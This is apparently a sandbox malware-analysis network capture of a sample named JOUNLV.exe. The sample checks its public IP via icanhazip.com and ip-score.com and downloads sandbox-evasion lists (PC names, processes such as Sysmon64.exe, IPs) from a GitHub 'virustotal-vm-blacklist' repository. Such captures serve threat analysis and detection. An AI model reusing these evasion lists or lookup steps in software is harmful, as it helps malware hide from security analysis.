                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:57:31.312499046 CET | 66 | OUT | GET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
Nov 29, 2024 10:57:31.713689089 CET | 373 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:34 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:57:53.047889948 CET | 66 | OUT | GET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
Nov 29, 2024 10:57:53.448875904 CET | 373 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:56 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:57:53.454797983 CET | 66 | OUT | GET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
Nov 29, 2024 10:57:53.856147051 CET | 373 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:56 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:58:15.191031933 CET | 66 | OUT | GET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
Nov 29, 2024 10:58:15.592215061 CET | 373 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:58:18 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:58:15.597872972 CET | 66 | OUT | GET /checkip/ HTTP/1.1
                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                          Host: ip-score.com
Nov 29, 2024 10:58:15.999650955 CET | 373 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                          Server: nginx/1.19.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:58:19 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Location: https://ip-score.com/checkip/
                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:58:37.298873901 CET  66  OUT  GET /checkip/ HTTP/1.1
    User-Agent: AutoIt
    Host: ip-score.com
Nov 29, 2024 10:58:37.702651978 CET  373  IN  HTTP/1.1 301 Moved Permanently
    Server: nginx/1.19.1
    Date: Fri, 29 Nov 2024 09:58:40 GMT
    Content-Type: text/html
    Content-Length: 169
    Connection: keep-alive
    Location: https://ip-score.com/checkip/
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:58:37.708468914 CET  66  OUT  GET /checkip/ HTTP/1.1
    User-Agent: AutoIt
    Host: ip-score.com
Nov 29, 2024 10:58:38.114833117 CET  373  IN  HTTP/1.1 301 Moved Permanently
    Server: nginx/1.19.1
    Date: Fri, 29 Nov 2024 09:58:41 GMT
    Content-Type: text/html
    Content-Length: 169
    Connection: keep-alive
    Location: https://ip-score.com/checkip/
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:58:59.421812057 CET  66  OUT  GET /checkip/ HTTP/1.1
    User-Agent: AutoIt
    Host: ip-score.com
Nov 29, 2024 10:58:59.824068069 CET  373  IN  HTTP/1.1 301 Moved Permanently
    Server: nginx/1.19.1
    Date: Fri, 29 Nov 2024 09:59:02 GMT
    Content-Type: text/html
    Content-Length: 169
    Connection: keep-alive
    Location: https://ip-score.com/checkip/
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>
Nov 29, 2024 10:58:59.829591990 CET  66  OUT  GET /checkip/ HTTP/1.1
    User-Agent: AutoIt
    Host: ip-score.com
Nov 29, 2024 10:59:00.231179953 CET  373  IN  HTTP/1.1 301 Moved Permanently
    Server: nginx/1.19.1
    Date: Fri, 29 Nov 2024 09:59:03 GMT
    Content-Type: text/html
    Content-Length: 169
    Connection: keep-alive
    Location: https://ip-score.com/checkip/
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.1</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49740        104.16.184.241  80                4828  C:\Users\user\AppData\Local\Temp\JOUNLV.exe

Timestamp  Bytes transferred  Direction  Data
Nov 29, 2024 10:57:16.237080097 CET  63  OUT  GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
Nov 29, 2024 10:57:17.333091974 CET  535  IN  HTTP/1.1 200 OK
    Date: Fri, 29 Nov 2024 09:57:17 GMT
    Content-Type: text/plain
    Content-Length: 13
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET
    Set-Cookie: __cf_bm=L13S0GP2ETX5a_Ef.sPicFLgx2nADMPIrWabJhw3HxM-1732874237-1.0.1.1-AIQJtokoSn4OZk4S5XUTdD0v4cczqjlP7Fm26qUghTWNds9Ok9WizpdfeJxcsJSuFnc8vcyPABFYMV4sTObm1Q; path=/; expires=Fri, 29-Nov-24 10:27:17 GMT; domain=.icanhazip.com; HttpOnly
    Server: cloudflare
    CF-RAY: 8ea1bb8e5f9d5e7c-EWR
    alt-svc: h3=":443"; ma=86400
    Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
    Data Ascii: 8.46.123.228


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49741        104.16.184.241  80                4828  C:\Users\user\AppData\Local\Temp\JOUNLV.exe

Timestamp  Bytes transferred  Direction  Data
Nov 29, 2024 10:57:19.299601078 CET  39  OUT  GET / HTTP/1.1
    Host: icanhazip.com
Nov 29, 2024 10:57:20.484688044 CET  535  IN  HTTP/1.1 200 OK
    Date: Fri, 29 Nov 2024 09:57:20 GMT
    Content-Type: text/plain
    Content-Length: 13
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET
    Set-Cookie: __cf_bm=8AHEjhpTt9IjeNLKhYvFexBOuk875rJ_88OJsz0l27M-1732874240-1.0.1.1-lW6aIg6YSUKhpkWRDjRGTa1J3ElNitillAfNom.i2HN3urRAn0u4qRhqTUt2YyrOg.uIObTlB178u9uli7vdjA; path=/; expires=Fri, 29-Nov-24 10:27:20 GMT; domain=.icanhazip.com; HttpOnly
    Server: cloudflare
    CF-RAY: 8ea1bba1fb6f8c27-EWR
    alt-svc: h3=":443"; ma=86400
    Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
    Data Ascii: 8.46.123.228


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49746        104.16.184.241  80                4828  C:\Users\user\AppData\Local\Temp\JOUNLV.exe

Timestamp  Bytes transferred  Direction  Data
Nov 29, 2024 10:57:26.451260090 CET  63  OUT  GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
Nov 29, 2024 10:57:27.589025974 CET  535  IN  HTTP/1.1 200 OK
    Date: Fri, 29 Nov 2024 09:57:27 GMT
    Content-Type: text/plain
    Content-Length: 13
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET
    Set-Cookie: __cf_bm=W64ch7iFz1Nni4C00E9.7SAl4b2Y6VVFDmwboiZbhIQ-1732874247-1.0.1.1-e6toI7G0jFg4OAHzdJ331BrgIj6cm_bj..jcWFOqKZDFphCiBzpPhpH_4s00k90mnFvldgdhdVkXk4nR8_NT0A; path=/; expires=Fri, 29-Nov-24 10:27:27 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8ea1bbce5ef68c84-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a
                                                                                                                                                                                                                                                          Data Ascii: 8.46.123.228


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 185.199.110.133 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:12 UTC | 124 | OUT | GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-11-29 09:57:12 UTC | 896 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 3145
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "72b0005e577398f4eb7596131aa14f87c4f7379acc30e24456d4830af5304467"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: E79B:24F1AE:A7DC9:B6584:67498FF6
    Accept-Ranges: bytes
    Date: Fri, 29 Nov 2024 09:57:12 GMT
    Via: 1.1 varnish
    X-Served-By: cache-nyc-kteb1890081-NYC
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1732874233.518753,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: d9556e9daaeeaadb578a7d707e3198bd8b9265f0
    Expires: Fri, 29 Nov 2024 10:02:12 GMT
    Source-Age: 2
2024-11-29 09:57:12 UTC | 1378 | IN | Data Raw: 30 30 39 30 30 42 43 38 33 38 30 32 0a 30 30 39 30 30 42 43 38 33 38 30 33 0a 30 43 43 34 37 41 43 38 33 38 30 33 0a 31 38 43 39 41 43 44 46 2d 37 43 30 30 2d 34 0a 33 43 45 43 45 46 43 38 33 38 30 36 0a 36 43 34 45 37 33 33 46 2d 43 32 44 39 2d 34 0a 41 42 49 47 41 49 0a 41 43 45 50 43 0a 41 49 44 41 4e 50 43 0a 41 4c 45 4e 4d 4f 4f 53 2d 50 43 0a 41 4c 49 4f 4e 45 0a 41 50 50 4f 4e 46 4c 59 2d 56 50 53 0a 41 52 43 48 49 42 41 4c 44 50 43 0a 61 7a 75 72 65 0a 42 33 30 46 30 32 34 32 2d 31 43 36 41 2d 34 0a 42 41 52 4f 53 49 4e 4f 2d 50 43 0a 42 45 43 4b 45 52 2d 50 43 0a 42 45 45 37 33 37 30 43 2d 38 43 30 43 2d 34 0a 43 38 31 46 36 36 43 38 33 38 30 35 0a 43 41 54 57 52 49 47 48 54 0a 43 48 53 48 41 57 0a 43 4f 46 46 45 45 2d 53 48 4f 50 0a 43 4f 4d 50
    Data Ascii: 00900BC8380200900BC838030CC47AC8380318C9ACDF-7C00-43CECEFC838066C4E733F-C2D9-4ABIGAIACEPCAIDANPCALENMOOS-PCALIONEAPPONFLY-VPSARCHIBALDPCazureB30F0242-1C6A-4BAROSINO-PCBECKER-PCBEE7370C-8C0C-4C81F66C83805CATWRIGHTCHSHAWCOFFEE-SHOPCOMP
2024-11-29 09:57:12 UTC | 1378 | IN | Data Raw: 46 4f 0a 44 45 53 4b 54 4f 50 2d 4c 54 4d 43 4b 4c 41 0a 44 45 53 4b 54 4f 50 2d 4d 4a 43 36 35 30 30 0a 44 45 53 4b 54 4f 50 2d 4d 57 46 52 56 4b 48 0a 44 45 53 4b 54 4f 50 2d 4e 41 4b 46 46 4d 54 0a 44 45 53 4b 54 4f 50 2d 4e 4b 50 30 49 34 50 0a 44 45 53 4b 54 4f 50 2d 4e 4d 31 5a 50 4c 47 0a 44 45 53 4b 54 4f 50 2d 4e 54 55 37 56 55 4f 0a 44 45 53 4b 54 4f 50 2d 4f 36 46 42 4d 46 37 0a 44 45 53 4b 54 4f 50 2d 4f 37 42 49 33 50 54 0a 44 45 53 4b 54 4f 50 2d 50 41 30 46 4e 56 35 0a 44 45 53 4b 54 4f 50 2d 50 4b 51 4e 44 53 52 0a 44 45 53 4b 54 4f 50 2d 51 4c 4e 32 56 55 46 0a 44 45 53 4b 54 4f 50 2d 51 55 41 59 38 47 53 0a 44 45 53 4b 54 4f 50 2d 52 43 41 33 51 57 58 0a 44 45 53 4b 54 4f 50 2d 52 48 58 44 4b 57 57 0a 44 45 53 4b 54 4f 50 2d 52 50 34 46
    Data Ascii: FODESKTOP-LTMCKLADESKTOP-MJC6500DESKTOP-MWFRVKHDESKTOP-NAKFFMTDESKTOP-NKP0I4PDESKTOP-NM1ZPLGDESKTOP-NTU7VUODESKTOP-O6FBMF7DESKTOP-O7BI3PTDESKTOP-PA0FNV5DESKTOP-PKQNDSRDESKTOP-QLN2VUFDESKTOP-QUAY8GSDESKTOP-RCA3QWXDESKTOP-RHXDKWWDESKTOP-RP4F
2024-11-29 09:57:12 UTC | 389 | IN | Data Raw: 45 45 4c 35 33 53 4e 0a 57 49 4e 5a 44 53 2d 31 42 48 52 56 50 51 55 0a 57 49 4e 5a 44 53 2d 32 32 55 52 4a 49 42 56 0a 57 49 4e 5a 44 53 2d 33 46 46 32 49 39 53 4e 0a 57 49 4e 5a 44 53 2d 35 4a 37 35 44 54 48 48 0a 57 49 4e 5a 44 53 2d 36 54 55 49 48 4e 37 52 0a 57 49 4e 5a 44 53 2d 38 4d 41 45 49 38 45 34 0a 57 49 4e 5a 44 53 2d 39 49 4f 37 35 53 56 47 0a 57 49 4e 5a 44 53 2d 41 4d 37 36 48 50 4b 32 0a 57 49 4e 5a 44 53 2d 42 30 33 4c 39 43 45 4f 0a 57 49 4e 5a 44 53 2d 42 4d 53 4d 44 38 4d 45 0a 57 49 4e 5a 44 53 2d 42 55 41 4f 4b 47 47 31 0a 57 49 4e 5a 44 53 2d 4b 37 56 49 4b 34 46 43 0a 57 49 4e 5a 44 53 2d 4d 49 4c 4f 42 4d 33 35 0a 57 49 4e 5a 44 53 2d 50 55 30 55 52 50 56 49 0a 57 49 4e 5a 44 53 2d 51 4e 47 4b 47 4e 35 39 0a 57 49 4e 5a 44 53 2d
    Data Ascii: EEL53SNWINZDS-1BHRVPQUWINZDS-22URJIBVWINZDS-3FF2I9SNWINZDS-5J75DTHHWINZDS-6TUIHN7RWINZDS-8MAEI8E4WINZDS-9IO75SVGWINZDS-AM76HPK2WINZDS-B03L9CEOWINZDS-BMSMD8MEWINZDS-BUAOKGG1WINZDS-K7VIK4FCWINZDS-MILOBM35WINZDS-PU0URPVIWINZDS-QNGKGN59WINZDS-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 185.199.110.133 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:12 UTC | 126 | OUT | GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-11-29 09:57:12 UTC | 894 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 31
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "b8ccbe01df84b6df59046ff7ef97fe02bbba9374a7a63f24d1c8a0b07083adca"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: F0F4:35108B:983CD:A6B92:67498FF6
    Accept-Ranges: bytes
    Date: Fri, 29 Nov 2024 09:57:12 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ewr-kewr1740021-EWR
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1732874233.519179,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 97faba4fe069289920342115ac1779551f03b39d
    Expires: Fri, 29 Nov 2024 10:02:12 GMT
    Source-Age: 2
2024-11-29 09:57:12 UTC | 31 | IN | Data Raw: 56 6d 52 65 6d 6f 74 65 47 75 65 73 74 2e 65 78 65 0a 53 79 73 6d 6f 6e 36 34 2e 65 78 65 0a
    Data Ascii: VmRemoteGuest.exeSysmon64.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49736 | 185.199.110.133 | 443 | 4828 | C:\Users\user\AppData\Local\Temp\JOUNLV.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-29 09:57:12 UTC | 119 | OUT | GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-11-29 09:57:12 UTC | 897 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 2853
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "a0f0ad87a3cc1741bf24d6d8ec37619ff28dab76edf802ca5ceb0e1349232152"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 44DC:1D95DE:656FD:73A52:67498FF6
    Accept-Ranges: bytes
    Date: Fri, 29 Nov 2024 09:57:12 GMT
    Via: 1.1 varnish
    X-Served-By: cache-nyc-kteb1890082-NYC
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1732874233.528719,VS0,VE8
    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          X-Fastly-Request-ID: 8b3b7b7689fc145b2e4c220b6f14f8cdca288520
                                                                                                                                                                                                                                                          Expires: Fri, 29 Nov 2024 10:02:12 GMT
                                                                                                                                                                                                                                                          Source-Age: 0
